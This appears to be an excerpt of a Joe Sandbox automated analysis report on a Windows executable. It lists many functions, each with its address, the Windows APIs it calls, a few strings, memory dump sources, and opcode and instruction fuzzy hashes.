                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$CreatePriority
                                                                                    • String ID: CreateThread failed
                                                                                    • API String ID: 2610526550-3849766595
                                                                                    • Opcode ID: f3f7f80d4933b12da82244f1bfbbbe9cf8b675e49d8c8317c5dcc956099d30eb
                                                                                    • Instruction ID: f70168d689bde650d74587769fa86577a783eb42eab537b60365ffe8534cc966
                                                                                    • Opcode Fuzzy Hash: f3f7f80d4933b12da82244f1bfbbbe9cf8b675e49d8c8317c5dcc956099d30eb
                                                                                    • Instruction Fuzzy Hash: D811BE35A18A428AE700FF18E8401A9F360FFA1796FD44131D75D0666CDF3CE1578728
                                                                                    Function 00007FF7B8F18CCC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryInitializeMallocSystem
                                                                                    • String ID: riched20.dll
                                                                                    • API String ID: 174490985-3360196438
                                                                                    • Opcode ID: 442b1cfc285d4ff2a49564092a55c12622d0b59162bfa60c64ad3ab0c84b5cc1
                                                                                    • Instruction ID: 99ea66050bc4a0523a2317d89dcac47ee4051b9c1deaa4cb0b44658b9f787a62
                                                                                    • Opcode Fuzzy Hash: 442b1cfc285d4ff2a49564092a55c12622d0b59162bfa60c64ad3ab0c84b5cc1
                                                                                    • Instruction Fuzzy Hash: E7F06871518A418AEB40AF64F4141AAF7A0FFA5755F840235E68D42758DF7CD14ACF14
                                                                                    Function 00007FF7B8F18A84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AutoCompleteFindWindow
                                                                                    • String ID: Edit
                                                                                    • API String ID: 4260060072-554135844
                                                                                    • Opcode ID: 885e5777d60de8b620790b51f36eb4d38224b5dce00ba2b539ec4ed97f7bb97f
                                                                                    • Instruction ID: bb1fd91a33a183cd1f385148a2510f4f76ef3253ae222dfe5a2d7f6297c2adcd
                                                                                    • Opcode Fuzzy Hash: 885e5777d60de8b620790b51f36eb4d38224b5dce00ba2b539ec4ed97f7bb97f
                                                                                    • Instruction Fuzzy Hash: D0E01A71F1860396FE15BB2AA8505F5D251AF7B752FCC5430CE0A0A6599E3CA1968338
                                                                                    Function 00007FF7B8F0FF64 Relevance: 4.6, APIs: 3, Instructions: 150windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF7B8F17DC0: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7B8F17DF0
                                                                                      • Part of subcall function 00007FF7B8F0A008: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8F0A1DC
                                                                                      • Part of subcall function 00007FF7B8EF1FA8: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8EF2003
                                                                                      • Part of subcall function 00007FF7B8EF12C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7B8EF13B5
                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8F1F9E8
                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8F1F9EE
                                                                                    • SendDlgItemMessageW.USER32 ref: 00007FF7B8F1FA1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                    • String ID:
                                                                                    • API String ID: 3842196933-0
                                                                                    • Opcode ID: 650464f74f6adde03c3e096a7ab7484960493bf9e270f66c25aec513068083cb
                                                                                    • Instruction ID: 5dd8a53a3c7b7d0aa7960955ad8b3a533783d1991bd02b0474b011e101f0cffb
                                                                                    • Opcode Fuzzy Hash: 650464f74f6adde03c3e096a7ab7484960493bf9e270f66c25aec513068083cb
                                                                                    • Instruction Fuzzy Hash: E051CF62F1464559FB00FBB9C4412FCE3629BA6785FC00236EB1D5779EEE2CE5428368
                                                                                    Function 00007FF7B8F1973C Relevance: 4.6, APIs: 3, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                    • String ID:
                                                                                    • API String ID: 2032784890-0
                                                                                    • Opcode ID: 98723d9f55368b2c94374f1f9097e19eeaaf1c2526e53fefa64e32e6fbf1f7f2
                                                                                    • Instruction ID: d122282bda0b2297cd9106b4d3171c0af9e239902ac6e223ad15f5f63082d5cf
                                                                                    • Opcode Fuzzy Hash: 98723d9f55368b2c94374f1f9097e19eeaaf1c2526e53fefa64e32e6fbf1f7f2
                                                                                    • Instruction Fuzzy Hash: 4F617F72B14A41DDEB00EF68C4502ECA3A1EB66799FD04632DB1C13A9DDF38D586C358
                                                                                    Function 00007FF7B8EF1754 Relevance: 4.6, APIs: 3, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2371198981-0
                                                                                    • Opcode ID: 8b315dc57e732e4b817d1df424eb13c89c6dcbcb93aab7ca25f36618ee65f805
                                                                                    • Instruction ID: 6eccb7cd04db45137d7cc23576cae6f0ab7203b14f4783bbc0f81af0cd6ebf73
                                                                                    • Opcode Fuzzy Hash: 8b315dc57e732e4b817d1df424eb13c89c6dcbcb93aab7ca25f36618ee65f805
                                                                                    • Instruction Fuzzy Hash: 2B411961B0468A85FA15AF6AE540169E351EB65BE4FC44631EF6C077D9DE3CE082C318
                                                                                    Function 00007FF7B8F01534 Relevance: 4.6, APIs: 3, Instructions: 109fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2272807158-0
                                                                                    • Opcode ID: 060cc0a38694d791e80acce914d530998a70a7722192c3303a1da7563db9334e
                                                                                    • Instruction ID: 8e994da052be8b6da22e655a6df54887ea78c40c5e58525a3474e2c138a525ca
                                                                                    • Opcode Fuzzy Hash: 060cc0a38694d791e80acce914d530998a70a7722192c3303a1da7563db9334e
                                                                                    • Instruction Fuzzy Hash: 4841F872A0878189E7209F18E44426DE3A0FB967B5F900330DFBD06AD9DF3CD4828718
                                                                                    Function 00007FF7B8F2266C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                    • String ID:
                                                                                    • API String ID: 3251591375-0
                                                                                    • Opcode ID: 37a456eb0663cc8f0b58a3dc1134bc714702bc727f811831befa984599e29d28
                                                                                    • Instruction ID: 21e0c8293979acff8600cef6ca27018aa210d87a1ad0089805a91aa9f7fa425b
                                                                                    • Opcode Fuzzy Hash: 37a456eb0663cc8f0b58a3dc1134bc714702bc727f811831befa984599e29d28
                                                                                    • Instruction Fuzzy Hash: D931E831A0D1474AFA54BF6C94213B9E291AF63746FC44434FB4E4B2DEDE3CA9078269
                                                                                    Function 00007FF7B8F1172C Relevance: 4.6, APIs: 3, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::bad_alloc::bad_alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1875163511-0
                                                                                    • Opcode ID: 347a1d0be82b04a822f8caac984823906b6ad4c79e8f8761dfd478e459a67773
                                                                                    • Instruction ID: b2b2e0ba1fc2ab0e15947d6aac7cc53161fa5e4554218934741817b04ac55b14
                                                                                    • Opcode Fuzzy Hash: 347a1d0be82b04a822f8caac984823906b6ad4c79e8f8761dfd478e459a67773
                                                                                    • Instruction Fuzzy Hash: 4D41B632A1864698FB50FB18D4093B8E3A0FB61B55FA85032EB5C0669DDF7DD887C324
                                                                                    Function 00007FF7B8EF255C Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2176759853-0
                                                                                    • Opcode ID: fed33a3ebc80013bb6e3ccf0a7268bec7f7373925f2f792f51519c1922125491
                                                                                    • Instruction ID: b95ccfdf78b14e9db5a9382c33d2aa69690b6d1d193c5299e1733f35a844a6ad
                                                                                    • Opcode Fuzzy Hash: fed33a3ebc80013bb6e3ccf0a7268bec7f7373925f2f792f51519c1922125491
                                                                                    • Instruction Fuzzy Hash: 6631C872A18B8681EA149B69E44016AE361FFDABD0F945331FB9C03B59DF3CE1818704
                                                                                    Function 00007FF7B8F03108 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1203560049-0
                                                                                    • Opcode ID: 08db2852ca505c60db5e713f284bd15ca363d920cadf6659b93265f0b72ade95
                                                                                    • Instruction ID: c5f982c2ddb8692323a8b306cec8c2da5441cd62d52735f32f4d0c4c1e1fefc5
                                                                                    • Opcode Fuzzy Hash: 08db2852ca505c60db5e713f284bd15ca363d920cadf6659b93265f0b72ade95
                                                                                    • Instruction Fuzzy Hash: 9621FC72F1868249EA20AF28E04116DE350FF9A796F904231EFAD42699DF3CD582860C
                                                                                    Function 00007FF7B8F0257C Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3118131910-0
                                                                                    • Opcode ID: 0512362e9904805e0142b42f5f3022b8d29620ae2009e93965c346b327072630
                                                                                    • Instruction ID: ab047c0586c1a2d96ad979ef11d2d4850958199e55bcf1c7bb3302616895f98c
                                                                                    • Opcode Fuzzy Hash: 0512362e9904805e0142b42f5f3022b8d29620ae2009e93965c346b327072630
                                                                                    • Instruction Fuzzy Hash: BD21EA72E1878289EA10AF28E44112EE360FF95B95F900331EBAD4669DDF3CD542C618
                                                                                    Function 00007FF7B8F02680 Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1203560049-0
                                                                                    • Opcode ID: 9f9aa67a1aa4d3da2ee12ed50ecbdca65ba24de9cc1849af6890b733dfe98275
                                                                                    • Instruction ID: 5ea43cc2e3850e1ea33b644f96e9c3af2d75bfb1dca7c8fafff514482a578951
                                                                                    • Opcode Fuzzy Hash: 9f9aa67a1aa4d3da2ee12ed50ecbdca65ba24de9cc1849af6890b733dfe98275
                                                                                    • Instruction Fuzzy Hash: B2219A72A1864145EA11AB2CE444129E361FBDA795F900331EBAD42699DF3CD5428718
                                                                                    Function 00007FF7B8F2AE84 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: edf978b1599f70b01789e90294df5d0059fd5f91f22ff7a19e628bf16fffa7ce
                                                                                    • Instruction ID: fc19c8ee1f12434792f1c3482550d36aff98c5e75894e8900529ceb091160291
                                                                                    • Opcode Fuzzy Hash: edf978b1599f70b01789e90294df5d0059fd5f91f22ff7a19e628bf16fffa7ce
                                                                                    • Instruction Fuzzy Hash: E8E01230A147054EFA047F29989527DE252AF66743F944438DA0A0335ACE3DA44B4224
                                                                                    Function 00007FF7B8EF3EF4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 309COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: R
                                                                                    • API String ID: 3668304517-1466425173
                                                                                    • Opcode ID: 6bd3ae5cd267d2ec596136bacbcd35aca56aafdda5195944177c100075fea662
                                                                                    • Instruction ID: 411fd756f1e3fa3b1104df48ea47f89a3e8b242530bd01c529590c844e4dba7a
                                                                                    • Opcode Fuzzy Hash: 6bd3ae5cd267d2ec596136bacbcd35aca56aafdda5195944177c100075fea662
                                                                                    • Instruction Fuzzy Hash: 16D1CB72B0868156FB64AB29D5802B9E7A5FB67B98FC40031CB5D03769CF3CE4628335
                                                                                    Function 00007FF7B8EF43EC Relevance: 3.1, APIs: 2, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: 7c6c7626438ce682649fd60108713d053a450690655aedce69f56d768da2fd6b
                                                                                    • Instruction ID: 2b8ae340a6c9ec9d25e89611039cedd1b9d0b0c247033f33eb3fa34975af22c9
                                                                                    • Opcode Fuzzy Hash: 7c6c7626438ce682649fd60108713d053a450690655aedce69f56d768da2fd6b
                                                                                    • Instruction Fuzzy Hash: 0241A362F1465544FB00FB79D4916ECE360AF56B98FD44231EF1D27A9EDE3894838328
                                                                                    Function 00007FF7B8F01B3C Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
